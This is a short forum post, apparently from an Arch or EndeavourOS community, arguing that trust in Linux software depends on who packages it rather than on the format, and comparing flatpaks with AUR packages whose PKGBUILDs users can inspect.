flatpaks are not safer than AUR packages as a general rule.
A flatpak is a framework and packaging format. Anyone can make a flatpak. flatpaks can have malicious code just like any other package. This is true of just about any packaging format you can think of.
You shouldn’t trust a packaging format. You should trust a packaging source/packager. In other words, Arch/EOS repo packages aren’t trustworthy because they use pacman’s package format. They are trustworthy because they are packaged by Arch TUs or the EndeavourOS team.
As this relates to flatpaks, you need to look at who is packaging them. Some flatpaks are officially packaged by the team/publisher of the software. Those should be considered pretty safe. However, many are not. Then it comes down to do you trust the packager.
The AUR has a huge advantage when it comes to trust. That is you don’t really need to trust anyone. AUR software isn’t packaged by a 3rd party. The packages are built on your machine. The AUR PKGBUILD files which are used as the “directions” to build the software are easy to view for yourself. Many AUR helpers even offer to display them to you as part of the update process.
Of course, whether you choose to prefer flatpaks over AUR packages is entirely a matter of personal preference. The great thing is that, here, you have the ability to choose for yourself.